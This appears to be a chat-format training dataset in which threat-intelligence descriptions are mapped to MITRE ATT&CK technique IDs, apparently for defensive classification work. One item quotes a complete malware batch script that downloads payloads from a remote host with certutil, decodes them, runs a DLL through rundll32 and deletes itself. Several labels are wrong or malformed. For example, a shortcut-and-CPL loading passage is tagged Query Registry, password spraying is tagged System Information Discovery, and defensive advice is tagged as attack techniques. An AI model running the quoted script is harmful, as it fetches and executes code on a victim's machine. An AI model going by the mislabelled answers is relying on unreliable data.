- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard has used `regsvr32.exe /s /i` to execute malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to download a DLL from C2 to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec has a plugin to detect active drivers of some security products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads and executes additional malware from either a Web address or a Microsoft OneDrive account."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This cabinet file is then extracted to the previously identified file path. Again, a shortcut file is written to the %TEMP% path with a name of ‘~Update.lnk’, which is in turn copied to the identified startup path with a filename of ‘Windows help.lnk’. This shortcut file calls the built-in ‘control.exe’ utility to in turn load the previously dropped malicious CPL file of ‘winhelp.cpl’. Finally, the malware calls the ‘winhelp.cpl’ file in a new process via the following command"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The encryption/decryption routine (refer to Figure 5) can be summarized as follows: Figure 5: Encryption/ Decryption Function Generate an array of integers from 0x00 to 0xff Scrambles the state of the table using the given key Encrypts or decrypts a string using the scrambled table from (b)"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can enumerate drives and list the contents of the C: drive on a victim's computer."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes systeminfo after initial communication is made to the remote server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Manage the use of privileged accounts. Configure access controls, including file, directory, and network share permissions with the principle of least privilege in mind. If a user only needs to read specific files, they should not have write access to those files, directories, or shares. Secure use of WMI by authorizing WMI users and setting permissions. Disable or limit remote WMI and file sharing. Block remote execution through PSEXEC. Segregate networks and functions. Harden network devices and secure access to infrastructure devices. Perform out-of-band network management. Disable SMBv1 and block all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139; this applies to all boundary devices"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aoqin Dragon has used the Themida packer to obfuscate malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can take a desktop screenshot and save the file into \"\\ProgramData\\Mail\\MailAg\\shot.png\"."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a tool that can obtain info about local and global group users, power users, and administrators."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The LNK file contains a list of commands that will be executed upon running, and a blob that is a base64 encoded compressed payload"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can save encryption parameters and system information to the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 created and modified startup files for persistence. APT41 added a registry key in \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" to establish persistence for Cobalt Strike."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this particular instance, the following script is retrieved:@echo off :if exist \"%PROGRAMFILES(x86)%\" (GOTO 64BITOS) ELSE (GOTO 32BITOS) :32BITOS certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt > nul certutil -decode -f setup.txt setup.cab > nul del /f /q setup.txt > nul GOTO ISEXIST :64BITOS :certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt > nul :certutil -d^ecode -f setup2.txt setup.cab > nul :del /f /q setup2.txt > nul :GOTO ISEXIST :ISEXIST if exist \"setup.cab\" (GOTO EXECUTE) ELSE (GOTO EXIT) :EXECUTE ver | findstr /i \"10\\.\" > nul IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS) :WIN10 expand %TEMP%\\setup.cab -F:* %CD% > nul :if exist \"%PROGRAMFILES(x86)%\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32 %TEMP%\\drv.dll EntryPoint) %TEMP%\\install.bat GOTO EXIT :OTHEROS wusa %TEMP%\\setup.cab /quiet /extract:%TEMP% > nul %TEMP%\\install.bat GOTO EXIT :EXIT del /f /q setup.cab > nul del /f /q %~dpnx0 > nulThis script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can store its configuration in the Registry at \"HKCU\\Software\\\" under frequently changing names including \"%USERNAME%\" and \"ToolTech-RM\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY can load a DLL using Rundll32."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to access the webcam on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT deletes the .LNK file from the startup directory as well as the dropper components."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "tries to add a scheduled task to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group used Ruler to configure a specially crafted Outlook Home Page URL to exploit the security bypass vulnerability CVE-2017-11774, which was fixed shortly after it was discovered. Successful exploitation automatically triggered remote code execution of a script when an Outlook client synced with a mailbox and rendered the profile Home Page URL. These scripts, usually VBScript followed by PowerShell, in turn initiated the delivery of various payloads"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32's backdoor possesses the capability to list files and directories on a machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can run Mimikatz to harvest credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We found a mechanism for decrypting, executing, and downloading an additional payload from the C&C server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre has the ability to create files in a TEMP folder to act as a database to store information."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels"
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious Kitten has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones."
- },
- {
- "role": "assistant",
- "content": "T1036.002 - Right-to-Left Override"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response"
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PyDCrypt will remove all created artifacts such as dropped executables."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "typically use ping and to enumerate systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has added accounts to specific groups with \"net localgroup\"."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use \"GetProcAddress\" to help delete malicious strings from memory."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has created scheduled tasks to run malicious scripts on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the malware."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to get directory listings or drive information on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, the threat actors used `tasklist` to collect a list of running processes on an infected system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses cmd.exe to execute commands for discovery."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods \"target_integrator.rb\" files under the \"/Library/Ruby/Gems\" folder or enumerates all \".xcodeproj\" folders under a given directory. XCSSET then downloads a script and Mach-O file into the Xcode project folder."
- },
- {
- "role": "assistant",
- "content": "T1195.001 - Compromise Software Dependencies and Development Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If opened, the dropper runs a loader known as Trojan.Vcrodat on the computer. Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor’s component may be run with elevated privileges"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command"
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may use net group \"domain admins\" /domain to display accounts in the \"domain admins\" permissions group and net localgroup \"administrators\" to list local system administrator group membership."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used UPX to pack files."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 14: System shut down upon discovery of security tools Ability to receive PowerShell script from the C2 server and execute on the machine"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The “VPN Client” is a legitimate Juniper VPN software bundled with Helminth, a malware in use by the OilRig threat agnet: JuniperSetupClientInstaller.exe 6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link) If the victim downloads and installs the file, their computer would get infected, while the legitimate VPN software is installed"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The tool was primarily used by the attackers to move laterally on the victim’s network. PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. WinSCP: Open source FTP client used to exfiltrate data from targeted organizations"
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSOURCE achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has hidden its GUI using the ShowWindow() WINAPI call."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMould has the ability to find files on the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
